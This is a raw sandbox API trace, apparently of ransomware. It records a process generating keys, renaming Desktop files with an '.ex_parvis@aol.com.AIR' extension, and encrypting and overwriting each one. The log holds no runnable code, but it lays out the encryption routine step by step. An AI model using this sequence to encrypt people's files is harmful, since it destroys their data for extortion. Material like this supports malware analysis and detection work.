[0160.802] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b58b8 | out: hHeap=0x2e0000) returned 1 [0160.802] CloseHandle (hObject=0x398) returned 1 [0160.802] GetProcessHeap () returned 0x2e0000 [0160.802] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.802] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.802] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.802] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328c60 | out: hHeap=0x2e0000) returned 1 [0160.802] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328ce8 | out: hHeap=0x2e0000) returned 1 [0160.803] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0160.803] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.803] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.803] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.803] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.803] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf", dwFileAttributes=0x80) returned 1 [0160.803] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf") returned 63 [0160.803] GetProcessHeap () returned 0x2e0000 [0160.803] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3a7428 [0160.803] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf" [0160.803] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf.12781717671972518758.ex_parvis@aol.com.AIR" [0160.803] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ihxilakj4yjyjxbiewmg.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ihxilakj4yjyjxbiewmg.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.805] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ihxilaKj4yJyjxBiEwMg.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ihxilakj4yjyjxbiewmg.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.805] GetProcessHeap () returned 0x2e0000 [0160.805] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.805] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=26772) returned 1 [0160.805] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6894 [0160.806] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.806] GetProcessHeap () returned 0x2e0000 [0160.806] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.806] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.806] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.807] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.807] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.807] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6894) returned 0x3aa410 [0160.807] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x6894) returned 0x3b0cb0 [0160.807] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.807] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0x6894, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0x6894, lpOverlapped=0x0) returned 1 [0160.807] SetFilePointer (in: hFile=0x398, lDistanceToMove=-26772, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.807] WriteFile (in: hFile=0x398, lpBuffer=0x3b0cb0*, nNumberOfBytesToWrite=0x6894, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b0cb0*, lpNumberOfBytesWritten=0x2acf9c8*=0x6894, lpOverlapped=0x0) returned 1 [0160.807] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.807] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b0cb0 | out: hHeap=0x2e0000) returned 1 [0160.807] CloseHandle (hObject=0x398) returned 1 [0160.807] GetProcessHeap () returned 0x2e0000 [0160.807] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.808] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.808] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.808] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328ce8 | out: hHeap=0x2e0000) returned 1 [0160.808] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328d70 | out: hHeap=0x2e0000) returned 1 [0160.808] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0160.808] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.808] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.808] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.808] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.808] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv", dwFileAttributes=0x80) returned 1 [0160.808] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv") returned 61 [0160.808] GetProcessHeap () returned 0x2e0000 [0160.808] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x336dd8 [0160.808] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv" [0160.808] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv.12781717671972518758.ex_parvis@aol.com.AIR" [0160.808] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hbddqm8geo0-ykoxuo.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hbddqm8geo0-ykoxuo.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.811] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hbDDqm8GEo0-YkOxuo.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hbddqm8geo0-ykoxuo.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.811] GetProcessHeap () returned 0x2e0000 [0160.811] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.811] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=30687) returned 1 [0160.811] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x77df [0160.811] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.811] GetProcessHeap () returned 0x2e0000 [0160.811] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.811] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.812] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.812] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.812] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.812] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x77df) returned 0x3aa410 [0160.812] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x77df) returned 0x3b1bf8 [0160.813] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.813] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0x77df, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0x77df, lpOverlapped=0x0) returned 1 [0160.813] SetFilePointer (in: hFile=0x398, lDistanceToMove=-30687, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.813] WriteFile (in: hFile=0x398, lpBuffer=0x3b1bf8*, nNumberOfBytesToWrite=0x77df, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b1bf8*, lpNumberOfBytesWritten=0x2acf9c8*=0x77df, lpOverlapped=0x0) returned 1 [0160.813] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.813] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b1bf8 | out: hHeap=0x2e0000) returned 1 [0160.813] CloseHandle (hObject=0x398) returned 1 [0160.813] GetProcessHeap () returned 0x2e0000 [0160.813] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.813] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.813] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.813] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328d70 | out: hHeap=0x2e0000) returned 1 [0160.813] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328df8 | out: hHeap=0x2e0000) returned 1 [0160.813] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328df8 [0160.813] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.813] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.813] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.814] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.814] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf", dwFileAttributes=0x80) returned 1 [0160.814] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf") returned 59 [0160.814] GetProcessHeap () returned 0x2e0000 [0160.814] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xdc) returned 0x336dd8 [0160.814] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf" [0160.814] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf.12781717671972518758.ex_parvis@aol.com.AIR" [0160.814] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gfesarpagq3rlxbm.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gfesarpagq3rlxbm.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.817] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GfeSaRPAgQ3rLXbm.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gfesarpagq3rlxbm.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.818] GetProcessHeap () returned 0x2e0000 [0160.818] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.818] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=41045) returned 1 [0160.818] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa055 [0160.818] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.818] GetProcessHeap () returned 0x2e0000 [0160.818] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.818] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.818] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.819] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.819] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.819] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa055) returned 0x3aa410 [0160.819] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa055) returned 0x3b4470 [0160.819] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.819] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0xa055, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0xa055, lpOverlapped=0x0) returned 1 [0160.819] SetFilePointer (in: hFile=0x398, lDistanceToMove=-41045, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.819] WriteFile (in: hFile=0x398, lpBuffer=0x3b4470*, nNumberOfBytesToWrite=0xa055, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b4470*, lpNumberOfBytesWritten=0x2acf9c8*=0xa055, lpOverlapped=0x0) returned 1 [0160.820] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.820] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b4470 | out: hHeap=0x2e0000) returned 1 [0160.820] CloseHandle (hObject=0x398) returned 1 [0160.820] GetProcessHeap () returned 0x2e0000 [0160.820] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.820] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.820] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.820] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328df8 | out: hHeap=0x2e0000) returned 1 [0160.820] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328e80 | out: hHeap=0x2e0000) returned 1 [0160.820] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x3a9428 [0160.820] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.820] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.820] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.820] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.820] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp", dwFileAttributes=0x80) returned 1 [0160.820] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp") returned 55 [0160.820] GetProcessHeap () returned 0x2e0000 [0160.820] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x336dd8 [0160.820] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp" [0160.820] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0160.820] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\esx9gsmcq1xl.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\esx9gsmcq1xl.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.822] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EsX9GsMCQ1XL.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\esx9gsmcq1xl.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.823] GetProcessHeap () returned 0x2e0000 [0160.823] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.823] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=86856) returned 1 [0160.823] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15348 [0160.823] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.823] GetProcessHeap () returned 0x2e0000 [0160.823] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.823] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.823] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.824] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.824] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.824] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x15348) returned 0x3aa410 [0160.824] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x15348) returned 0x30d0048 [0160.825] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.825] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, 